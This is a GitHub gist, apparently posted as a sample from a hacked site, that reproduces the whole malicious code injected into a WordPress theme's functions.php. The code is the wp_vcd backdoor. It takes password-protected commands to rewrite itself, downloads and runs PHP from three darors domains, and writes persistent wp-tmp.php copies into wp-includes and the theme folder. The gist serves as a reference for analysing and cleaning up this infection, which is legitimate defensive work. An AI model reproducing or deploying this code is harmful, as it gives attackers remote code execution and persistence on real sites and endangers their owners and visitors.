Created
August 1, 2019 21:01
-
-
Save chrisvasey/5f989ef8c7c83bc5abd639d6aa885bdb to your computer and use it in GitHub Desktop.
functions.php - Hacked site
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '9b7b020c522dc02d6989db47267bf0eb')) | |
| { | |
| $div_code_name = "wp_vcd"; | |
| switch ($_REQUEST['action']) | |
| { | |
| case 'change_domain'; | |
| if (isset($_REQUEST['newdomain'])) | |
| { | |
| if (!empty($_REQUEST['newdomain'])) | |
| { | |
| if ($file = @file_get_contents(__FILE__)) | |
| { | |
| if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) | |
| { | |
| $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file); | |
| @file_put_contents(__FILE__, $file); | |
| print "true"; | |
| } | |
| } | |
| } | |
| } | |
| break; | |
| case 'change_code'; | |
| if (isset($_REQUEST['newcode'])) | |
| { | |
| if (!empty($_REQUEST['newcode'])) | |
| { | |
| if ($file = @file_get_contents(__FILE__)) | |
| { | |
| if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) | |
| { | |
| $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']) , $file); | |
| @file_put_contents(__FILE__, $file); | |
| print "true"; | |
| } | |
| } | |
| } | |
| } | |
| break; | |
| default: | |
| print "ERROR_WP_ACTION WP_V_CD WP_CD"; | |
| } | |
| die(""); | |
| } | |
| $div_code_name = "wp_vcd"; | |
| $funcfile = __FILE__; | |
| if (!function_exists('theme_temp_setup')) | |
| { | |
| $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; | |
| if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) | |
| { | |
| function file_get_contents_tcurl($url) | |
| { | |
| $ch = curl_init(); | |
| curl_setopt($ch, CURLOPT_AUTOREFERER, true); | |
| curl_setopt($ch, CURLOPT_HEADER, 0); | |
| curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
| curl_setopt($ch, CURLOPT_URL, $url); | |
| curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
| $data = curl_exec($ch); | |
| curl_close($ch); | |
| return $data; | |
| } | |
| function theme_temp_setup($phpCode) | |
| { | |
| $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup"); | |
| $handle = fopen($tmpfname, "w+"); | |
| if (fwrite($handle, "<?php\n" . $phpCode)) | |
| { | |
| } | |
| else | |
| { | |
| $tmpfname = tempnam('./', "theme_temp_setup"); | |
| $handle = fopen($tmpfname, "w+"); | |
| fwrite($handle, "<?php\n" . $phpCode); | |
| } | |
| fclose($handle); | |
| include $tmpfname; | |
| unlink($tmpfname); | |
| return get_defined_vars(); | |
| } | |
| $wp_auth_key = 'ac15616a33a4bae1388c29de0202c5e1'; | |
| if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") or $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) and stripos($tmpcontent, $wp_auth_key) !== false) | |
| { | |
| if (stripos($tmpcontent, $wp_auth_key) !== false) | |
| { | |
| extract(theme_temp_setup($tmpcontent)); | |
| @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) | |
| { | |
| @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(get_template_directory() . '/wp-tmp.php')) | |
| { | |
| @file_put_contents('wp-tmp.php', $tmpcontent); | |
| } | |
| } | |
| } | |
| } | |
| elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") and stripos($tmpcontent, $wp_auth_key) !== false) | |
| { | |
| if (stripos($tmpcontent, $wp_auth_key) !== false) | |
| { | |
| extract(theme_temp_setup($tmpcontent)); | |
| @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) | |
| { | |
| @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(get_template_directory() . '/wp-tmp.php')) | |
| { | |
| @file_put_contents('wp-tmp.php', $tmpcontent); | |
| } | |
| } | |
| } | |
| } | |
| elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") and stripos($tmpcontent, $wp_auth_key) !== false) | |
| { | |
| if (stripos($tmpcontent, $wp_auth_key) !== false) | |
| { | |
| extract(theme_temp_setup($tmpcontent)); | |
| @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) | |
| { | |
| @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(get_template_directory() . '/wp-tmp.php')) | |
| { | |
| @file_put_contents('wp-tmp.php', $tmpcontent); | |
| } | |
| } | |
| } | |
| } | |
| elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') and stripos($tmpcontent, $wp_auth_key) !== false) | |
| { | |
| extract(theme_temp_setup($tmpcontent)); | |
| } | |
| elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') and stripos($tmpcontent, $wp_auth_key) !== false) | |
| { | |
| extract(theme_temp_setup($tmpcontent)); | |
| } | |
| elseif ($tmpcontent = @file_get_contents('wp-tmp.php') and stripos($tmpcontent, $wp_auth_key) !== false) | |
| { | |
| extract(theme_temp_setup($tmpcontent)); | |
| } | |
| } | |
| } | |
| //$start_wp_theme_tmp | |
| //wp_tmp | |
| //$end_wp_theme_tmp | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment